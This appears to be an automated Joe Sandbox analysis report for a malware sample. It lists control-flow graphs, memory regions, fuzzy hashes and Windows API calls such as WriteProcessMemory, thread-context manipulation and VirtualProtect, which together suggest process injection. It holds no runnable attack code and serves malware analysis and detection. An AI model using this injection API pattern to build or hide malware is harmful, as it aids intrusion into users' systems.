                                                                                                              • Opcode ID: 0122d2877d46c005246affead1e066d0fe35f447c46e19353487033c97668fc0
                                                                                                              • Instruction ID: 0dbf9c15b68596dd04b058a578fd1f0e829f5344b41c67b6ce64daa2eda0ef1a
                                                                                                              • Opcode Fuzzy Hash: 0122d2877d46c005246affead1e066d0fe35f447c46e19353487033c97668fc0
                                                                                                              • Instruction Fuzzy Hash: 56721B34A0221AAFCB18EF75E9526ED7BF1FB44304F1086A8D04ABF255DB306E858F55

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 529 10ba948-10ba973 530 10ba978-10ba97b 529->530 531 10ba97d 530->531 532 10ba984-10ba986 530->532 531->532 533 10bab8b-10bab90 531->533 534 10baae8-10baaf5 531->534 535 10bab68-10bab6c 531->535 536 10bab2e-10bab32 531->536 537 10baa2c-10baa60 531->537 538 10baacc-10baadb 531->538 539 10ba9a2 531->539 540 10bab01 531->540 541 10baa00-10baa29 531->541 542 10baafd-10baaff 531->542 543 10bab92 531->543 544 10ba9f6-10ba9fb 531->544 545 10ba996-10ba9a0 531->545 546 10ba988 532->546 547 10ba98f-10ba994 532->547 549 10bab22-10bab25 533->549 534->542 555 10bab6e-10bab80 535->555 556 10bab82 535->556 552 10bab53 536->552 553 10bab34-10bab3d 536->553 596 10baa62 call 10bac10 537->596 597 10baa62 call 10bac20 537->597 570 10baadd 538->570 571 10baae4-10baae6 538->571 548 10ba9a7-10ba9b4 539->548 540->549 541->537 551 10baac0-10baac3 542->551 550 10bab95-10baba9 543->550 544->550 545->548 554 10ba98d 546->554 547->554 558 10ba9ba-10ba9c2 548->558 559 10babb3-10babc2 548->559 549->536 565 10bab27 549->565 551->538 560 10baac5 551->560 568 10bab56-10bab58 552->568 566 10bab3f-10bab42 553->566 567 10bab44-10bab47 553->567 554->530 557 10bab85 555->557 556->557 557->533 558->559 569 10ba9c8-10ba9da 558->569 560->533 560->534 560->535 560->536 560->538 560->540 560->542 560->543 565->533 565->535 565->536 565->543 573 10bab51 566->573 567->573 574 10bab5a 568->574 575 10bab61-10bab66 568->575 569->559 576 10ba9e0-10ba9e6 569->576 577 10baae2 570->577 571->577 573->568 580 10bab5f 574->580 575->580 581 10ba9e8 576->581 582 10ba9ef-10ba9f4 576->582 577->551 580->549 583 10ba9ed 581->583 582->583 583->530 585 10baa68-10baa6e 586 10baa72-10baa7e 585->586 587 10baa70 585->587 588 10baa80-10baa9b 586->588 587->588 594 10baa9d call 10bb5b3 588->594 595 10baa9d call 10bb5c0 588->595 592 10baaa3-10baabb 592->551 594->592 595->592 596->585 597->585
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: x+$Yq$Yq$Yq$d^t$d^t$d^t$d^t$d^t$d^t
                                                                                                              • API String ID: 0-3576056149
                                                                                                              • Opcode ID: 1d0a734963d0469a6b7e06704b8b439bc6fb4dcdbe58e488c30e5e6faa291365
                                                                                                              • Instruction ID: 69897d3bd6c86320f0dd8c8dc8569d55a66e35b8c043c860700db04a7841e6fc
                                                                                                              • Opcode Fuzzy Hash: 1d0a734963d0469a6b7e06704b8b439bc6fb4dcdbe58e488c30e5e6faa291365
                                                                                                              • Instruction Fuzzy Hash: 1751A334B04204CFDB158F69C590BED77F2FB49350F64896AD4A6AB282DB39CC41CB61

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 880 10b54d9-10b552c 884 10b5532-10b5546 880->884 885 10b5747-10b5756 880->885 946 10b5548 call 10b58d8 884->946 947 10b5548 call 10b57a0 884->947 886 10b554e-10b5560 886->885 889 10b5566-10b556a 886->889 890 10b556e-10b557f 889->890 891 10b556c 889->891 890->885 896 10b5585 890->896 892 10b558d-10b558f 891->892 894 10b55a9-10b55ac 892->894 895 10b5591-10b5597 892->895 899 10b55b1-10b55b4 894->899 897 10b559b-10b55a7 895->897 898 10b5599 895->898 896->892 897->894 898->894 900 10b55bd-10b55d4 899->900 901 10b55b6 899->901 915 10b561c-10b561e 900->915 916 10b55d6 900->916 901->900 903 10b55dd-10b5615 901->903 904 10b56b2-10b56d6 901->904 905 10b5722 901->905 906 10b5670-10b5674 901->906 907 10b56e7-10b56f6 901->907 908 10b5706-10b5720 901->908 909 10b5625-10b5642 901->909 903->915 934 10b56db-10b56de 904->934 905->885 911 10b5697 906->911 912 10b5676-10b567f 906->912 925 10b56f8 907->925 926 10b56ff-10b5704 907->926 908->934 935 10b5620 909->935 936 10b5644-10b5646 909->936 920 10b569a-10b56a9 911->920 913 10b5681-10b5684 912->913 914 10b5686-10b5693 912->914 923 10b5695 913->923 914->923 924 10b55db 915->924 916->924 920->904 923->920 924->899 929 10b56fd 925->929 926->929 929->934 934->907 937 10b56e0 934->937 935->909 938 10b5648-10b564a 936->938 939 10b564e-10b5651 936->939 937->905 937->907 937->908 938->935 941 10b564c 938->941 939->935 942 10b5653-10b5656 939->942 941->942 942->935 943 10b5658-10b565a 942->943 945 10b5664-10b566b 943->945 945->899 946->886 947->886
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D@$XXq$XXq$XXq$XXq$XXq$XXq$XXq$XXq
                                                                                                              • API String ID: 0-2668322306
                                                                                                              • Opcode ID: f6487a10684549babc60b15249ad7d1a79082262f90d427a3d3b012d0237fa77
                                                                                                              • Instruction ID: 4bbda64f7e50d6f4a2cb74e9b7f107f1e43b656196f97c48d8310ea1b96698b1
                                                                                                              • Opcode Fuzzy Hash: f6487a10684549babc60b15249ad7d1a79082262f90d427a3d3b012d0237fa77
                                                                                                              • Instruction Fuzzy Hash: B951C930F002049FEB149B79ED957EE76F2BFC8310F2884AAD545AF394DA758C418B62

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 5509 10b5358-10b5378 5510 10b537d-10b5380 5509->5510 5511 10b5389-10b539c 5510->5511 5512 10b5382 5510->5512 5521 10b539e 5511->5521 5522 10b53a0-10b53a2 5511->5522 5512->5511 5513 10b5439-10b543b 5512->5513 5514 10b5443-10b5450 5512->5514 5515 10b5440 5512->5515 5516 10b53b7-10b53c5 5512->5516 5513->5510 5517 10b547d-10b548a 5514->5517 5518 10b5452-10b545f 5514->5518 5515->5514 5526 10b53e3 5516->5526 5527 10b53c7-10b53cd 5516->5527 5518->5517 5520 10b5461-10b547c 5518->5520 5524 10b53ac-10b53af 5521->5524 5522->5524 5524->5516 5528 10b53e5-10b53f4 5526->5528 5529 10b53cf-10b53d1 5527->5529 5530 10b53d3-10b53df 5527->5530 5534 10b540a 5528->5534 5535 10b53f6-10b5408 5528->5535 5531 10b53e1 5529->5531 5530->5531 5531->5528 5536 10b540d-10b540f 5534->5536 5535->5536 5537 10b5418-10b5432 call 10b4f4c 5536->5537 5538 10b5411 5536->5538 5540 10b5437 5537->5540 5538->5537 5540->5513
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: XI$XI$XI$XI
                                                                                                              • API String ID: 0-2736759378
                                                                                                              • Opcode ID: 96195b120ba6ca5307a65bf143cc90160aa8238c8eda499786a089e7ef90a1f5
                                                                                                              • Instruction ID: 68f4cb775043bfda707bcf2be136a65aa17efdfc565ece134f3f73eda4756f87
                                                                                                              • Opcode Fuzzy Hash: 96195b120ba6ca5307a65bf143cc90160aa8238c8eda499786a089e7ef90a1f5
                                                                                                              • Instruction Fuzzy Hash: D631A370A0520ACFDB15DB68C8956EEBBF2EF85304F2484AAC055AF352DB749D41CBA1

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 6463 78b1f30-78b1f55 6464 78b1f5b-78b1f5d 6463->6464 6465 78b20a9-78b20ce 6463->6465 6466 78b1f63-78b1f6c 6464->6466 6467 78b20d5-78b211a 6464->6467 6465->6467 6468 78b1f7f-78b1fa6 6466->6468 6469 78b1f6e-78b1f7c 6466->6469 6499 78b211c-78b2122 6467->6499 6500 78b2123-78b2129 6467->6500 6472 78b202f-78b2033 6468->6472 6473 78b1fac-78b1fbe call 78b1870 6468->6473 6469->6468 6474 78b206a-78b2083 6472->6474 6475 78b2035-78b2062 call 78b1538 6472->6475 6473->6472 6490 78b1fc0-78b2013 6473->6490 6484 78b208d-78b208e 6474->6484 6485 78b2085 6474->6485 6494 78b2067 6475->6494 6484->6465 6485->6484 6490->6472 6495 78b2015-78b2028 6490->6495 6494->6474 6495->6472 6499->6500 6501 78b212b-78b213b 6499->6501 6500->6501 6502 78b213d-78b2146 6501->6502 6503 78b2147-78b218a 6501->6503 6509 78b218c-78b2191 6503->6509 6510 78b2193-78b221c 6503->6510 6509->6510 6512 78b2222-78b2230 6510->6512 6513 78b2239-78b2271 6512->6513 6514 78b2232-78b2238 6512->6514 6518 78b2273-78b2277 6513->6518 6519 78b2281 6513->6519 6514->6513 6518->6519 6520 78b2279 6518->6520 6521 78b2282 6519->6521 6520->6519 6521->6521
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$(q$(q
                                                                                                              • API String ID: 0-2103260149
                                                                                                              • Opcode ID: e47972319b0af35a89f2637e21c972bd116534b04986d56e89c0ce74ab92de0f
                                                                                                              • Instruction ID: b68e5ad86494ec0ab53bbb29e1f42fcb8a05f5b8ada97edd1b102ffa6da811cd
                                                                                                              • Opcode Fuzzy Hash: e47972319b0af35a89f2637e21c972bd116534b04986d56e89c0ce74ab92de0f
                                                                                                              • Instruction Fuzzy Hash: 1CA17BB0E003099FDB25DFA9D84879EBBF1FF89310F14855AE805AB391DB709985CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: c9dce9f9ae1363cc558d545a85b7ff6a41a30d41e96d834046d13f3358f7bda8
                                                                                                              • Instruction ID: f8bfb09f9fd1346e8f1d8c1b69ca8dcc9979cfbb3701b18372fc3929618ff0f6
                                                                                                              • Opcode Fuzzy Hash: c9dce9f9ae1363cc558d545a85b7ff6a41a30d41e96d834046d13f3358f7bda8
                                                                                                              • Instruction Fuzzy Hash: 8882E171E08354CFC705ABB8D8A975D7FB1AF46300F4641EAD085DB3A6DA389C49CB62
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: ec4188e1ad46eb09894df38363291abe2b69eca6de8c8276ae1b69fae87b531a
                                                                                                              • Instruction ID: e209b2d880b6b21a01bd815bc8cbfaacd36202fc41c1615453ccca7f1232aabe
                                                                                                              • Opcode Fuzzy Hash: ec4188e1ad46eb09894df38363291abe2b69eca6de8c8276ae1b69fae87b531a
                                                                                                              • Instruction Fuzzy Hash: A7624270A002188FFB25DBA4C954BDEBBB6EF88300F1081ADD10A6B3A5DE359D41DF65
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: 79b945ea16a580e0679c8c3373821159f72a1dfcaeca1a5a0ec708e0f184ab9c
                                                                                                              • Instruction ID: 9ff9f72de11c3dd1843e476775216b8e37ad3c104cd157a0ce4fd65191e80729
                                                                                                              • Opcode Fuzzy Hash: 79b945ea16a580e0679c8c3373821159f72a1dfcaeca1a5a0ec708e0f184ab9c
                                                                                                              • Instruction Fuzzy Hash: 5DC1DF71B103148BCB04BBBDE49A66E7FB6AFC9300F444569E046E7394DE38DC4983A2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: 31f27076415ab37afe6853a99077f9cdcdec573b9d4e2844d17954c4667e0612
                                                                                                              • Instruction ID: 798249e53108fe1d860f493566c69faa678f6d00b1180840432ca5b3ebe04d81
                                                                                                              • Opcode Fuzzy Hash: 31f27076415ab37afe6853a99077f9cdcdec573b9d4e2844d17954c4667e0612
                                                                                                              • Instruction Fuzzy Hash: 6DA103307002099FEB05AF69D894BBE7BF6FB88342F148469E546DB291CB75DC42CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$,q
                                                                                                              • API String ID: 0-1667412543
                                                                                                              • Opcode ID: 699df23b58427956e18aee4f1f8c3d1ecc4142cd37ef3dcc9de07276d4b521b8
                                                                                                              • Instruction ID: da1aecdfd26b28208e70d6e0815595482cb60923c48a27bc30dc8917ffb3c22b
                                                                                                              • Opcode Fuzzy Hash: 699df23b58427956e18aee4f1f8c3d1ecc4142cd37ef3dcc9de07276d4b521b8
                                                                                                              • Instruction Fuzzy Hash: 54817D34A011068FDB54CF6DC8C4AAEBBF2BF89314B5480A9D566DB3A5DB32E841CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TJq$Teq
                                                                                                              • API String ID: 0-3317343146
                                                                                                              • Opcode ID: 24f28641874cc1e901f9ad9242a12fcb9933dc1b8f79db16befe499f1e04b11b
                                                                                                              • Instruction ID: 90746b94bd50a01084ef52c5c61fdfeca2be87eba0c65ff9300425d357edb04a
                                                                                                              • Opcode Fuzzy Hash: 24f28641874cc1e901f9ad9242a12fcb9933dc1b8f79db16befe499f1e04b11b
                                                                                                              • Instruction Fuzzy Hash: D9F0F6317101100FCA08A77DB468B3E76EFAFC97207144059F506DB3A5CD64DC064395
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 337495936e0e28f799a319aebae885969804ba93634ebbad33c4dae018dd3ec5
                                                                                                              • Instruction ID: b7af846b753a984aeb2eda1e79a91f27287869d8c571e41101d709cf32395305
                                                                                                              • Opcode Fuzzy Hash: 337495936e0e28f799a319aebae885969804ba93634ebbad33c4dae018dd3ec5
                                                                                                              • Instruction Fuzzy Hash: EF128B71B142148BDB04FBB8E489B6D7FB2EB88300F654529E046E37A9DE38E854DB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 180cedbd52b69e6a542789e14b653bfcb3c9de94a77dab0bca98b08250d04f94
                                                                                                              • Instruction ID: 75d62ab8ba83ba923216b17e0f928fd80fca834c2d1a629fbaf09794cbd2fdb2
                                                                                                              • Opcode Fuzzy Hash: 180cedbd52b69e6a542789e14b653bfcb3c9de94a77dab0bca98b08250d04f94
                                                                                                              • Instruction Fuzzy Hash: 70128C71B142148BDB04FBB8E489B6D7FB2EF88300F614529E046E37A9DE38E854DB51
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 050028E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 65735829796930982824964bd5495e01b5de38e2dbe71ff18b555a58c1775b0f
                                                                                                              • Instruction ID: c8a518ccaa2a17578f311ca19a499b33118dd687a0fc8d4c707b8280bc3bbedc
                                                                                                              • Opcode Fuzzy Hash: 65735829796930982824964bd5495e01b5de38e2dbe71ff18b555a58c1775b0f
                                                                                                              • Instruction Fuzzy Hash: E8716874A00B058FEB64DF2AE5447AABBF1FF88304F10892DD08AD7A90D775E845CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: b78102ae983995a8bd7acebc206da14be3c2566d1fbf16db1fd60bb7671701c3
                                                                                                              • Instruction ID: 60c191edf5e1fc33ec7ef737f76bf559c5a8b065e601e5e7d111b5ca66a03015
                                                                                                              • Opcode Fuzzy Hash: b78102ae983995a8bd7acebc206da14be3c2566d1fbf16db1fd60bb7671701c3
                                                                                                              • Instruction Fuzzy Hash: EDE1A371B102108BCB04FBBCE599B6EBFA6AF84340F554629D046E3398DE38ED15C362
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05008062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: dd9f677475962b88ba7e85ad9113d2af83a3b85de39c7424bcfb311e953d6a13
                                                                                                              • Instruction ID: 5c8eb21f8020d75634884a25805cf977a9255bfba7bba595eba8b88d91d4d688
                                                                                                              • Opcode Fuzzy Hash: dd9f677475962b88ba7e85ad9113d2af83a3b85de39c7424bcfb311e953d6a13
                                                                                                              • Instruction Fuzzy Hash: 2451FDB1D003489FEB14CFA9D884ADEBBB1FF48310F24812AE818AB251D775A845CF91
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05008062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 34c9de65f5a7ee61a679c3a2941503ea3926a1c7ba4c8684164f05f53fa1ea9e
                                                                                                              • Instruction ID: 61413d55bd3a7194027f010e61bdb3a2ef092a1b6221b2be4f54bbfb1c2d2ba2
                                                                                                              • Opcode Fuzzy Hash: 34c9de65f5a7ee61a679c3a2941503ea3926a1c7ba4c8684164f05f53fa1ea9e
                                                                                                              • Instruction Fuzzy Hash: 9641CEB1D00359DFDB14CFAAD884ADEBBB5BF48310F24812AE819AB250D775A845CF91
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0500A5D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: a10ac92171512e20287f822483d8296fcdab022b7db56726273e4f8523c4b17e
                                                                                                              • Instruction ID: 991d2b5abd6ab15c4fd3bd3e456f3f7f845aa4a0b041448ee795f8635e19a273
                                                                                                              • Opcode Fuzzy Hash: a10ac92171512e20287f822483d8296fcdab022b7db56726273e4f8523c4b17e
                                                                                                              • Instruction Fuzzy Hash: 1E412AB4A00309CFDB14CF9AD488BAEBBF5FB88315F248459D519AB361D774A941CBA0
                                                                                                              APIs
• DeleteFileW.KERNELBASE(00000000), ref: 076DBE90
Memory Dump Source
• Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 770c89af896487c5d6e224205df8c0b53fabba8e4b6dd712e7448f8e4fea1910
• Instruction ID: 22c8d765d2140f3edd5411f7d0b24942422bc2c5d4be803f9b8ae6d9ba4b2a55
• Opcode Fuzzy Hash: 770c89af896487c5d6e224205df8c0b53fabba8e4b6dd712e7448f8e4fea1910
• Instruction Fuzzy Hash: 0E219AB2C0066A9FDB14CFAAC840BDEFBB4FF09210F15811AD859A7241D3385944CFA5
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0901E378
Memory Dump Source
• Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 1e326a90bdaf0a830dee55db6d28a8c2b1028f2787cd418d38548d3f96e66253
• Instruction ID: 61b30f5d26388c8d9359f6b7cff18b936512e9473b231d972ff71a0b25a2c7e4
• Opcode Fuzzy Hash: 1e326a90bdaf0a830dee55db6d28a8c2b1028f2787cd418d38548d3f96e66253
• Instruction Fuzzy Hash: 70212775D003599FDB10CFAAC884BDEBBF5FF48310F10842AE919A7240D7789940DBA5
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0901EAA6
Memory Dump Source
• Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 5c75fe4cb8519be8f743cfb1decc687e31c1814e845de70067ed0f8515058c89
• Instruction ID: 9811964fb5ce9d901403c1f3c685630e1e28026dcd403cb42c37d75025589585
• Opcode Fuzzy Hash: 5c75fe4cb8519be8f743cfb1decc687e31c1814e845de70067ed0f8515058c89
• Instruction Fuzzy Hash: 3F210771D003098FDB14DFAAC485BAEBBF4BF48214F54842AD859A7640DB78A944CBA5
APIs
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0901D93E
Memory Dump Source
• Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 1bbe43f0678ebe305d7bb6979e1735b3b99b20ed30e47a83a5c2e5dbb66d8d35
• Instruction ID: a3ba332998a41c16905610a24a3039805c8c46ef9b6ba8652a68ff4ade6b5cd8
• Opcode Fuzzy Hash: 1bbe43f0678ebe305d7bb6979e1735b3b99b20ed30e47a83a5c2e5dbb66d8d35
• Instruction Fuzzy Hash: 50213571D003098FDB14CFAAC484BEEBBF4AF48224F14842AE459A7280CB789945CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05003AEF
Memory Dump Source
• Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: f5e5b86ccdb37a84ce079dd312d51f00194874dad346e8a91d185128bd109e97
• Instruction ID: a1a1b90220601cb14cdde39f3cc884b86a5beefa2d68ad2ad7d41b3037e5a45d
• Opcode Fuzzy Hash: f5e5b86ccdb37a84ce079dd312d51f00194874dad346e8a91d185128bd109e97
• Instruction Fuzzy Hash: 8621E3B5D002589FDB10CFAAD884ADEBBF4FB48310F14841AE914A3350D378A940CF65
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0798CA93
Memory Dump Source
• Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: c04a3b5c4369d33129871b328284cef855083f50dbeae2f2265a51f2097c46d4
• Instruction ID: a3dc30e0d944ab3fdb924d8b3cdd3839c091345426ddefd9b1d9a978e1ba12d3
• Opcode Fuzzy Hash: c04a3b5c4369d33129871b328284cef855083f50dbeae2f2265a51f2097c46d4
• Instruction Fuzzy Hash: 8A2125B59043599FCB11CFAAC880ADEFFF4AB49310F10846AE458A7251D378AA44CFA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05003AEF
Memory Dump Source
• Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 34953309b3373cbd56441ad003fb4d61761043eadd44c3eaa2a6cbabaf321565
• Instruction ID: 23ab485c0d2a9bd5e0301e36f503b2fefd713f205937c9e79d891d80f7cd76fb
• Opcode Fuzzy Hash: 34953309b3373cbd56441ad003fb4d61761043eadd44c3eaa2a6cbabaf321565
• Instruction Fuzzy Hash: 7A21E2B5D002589FDB10CFAAD884ADEFBF8FB48310F14841AE918A3350D378A940CFA5
APIs
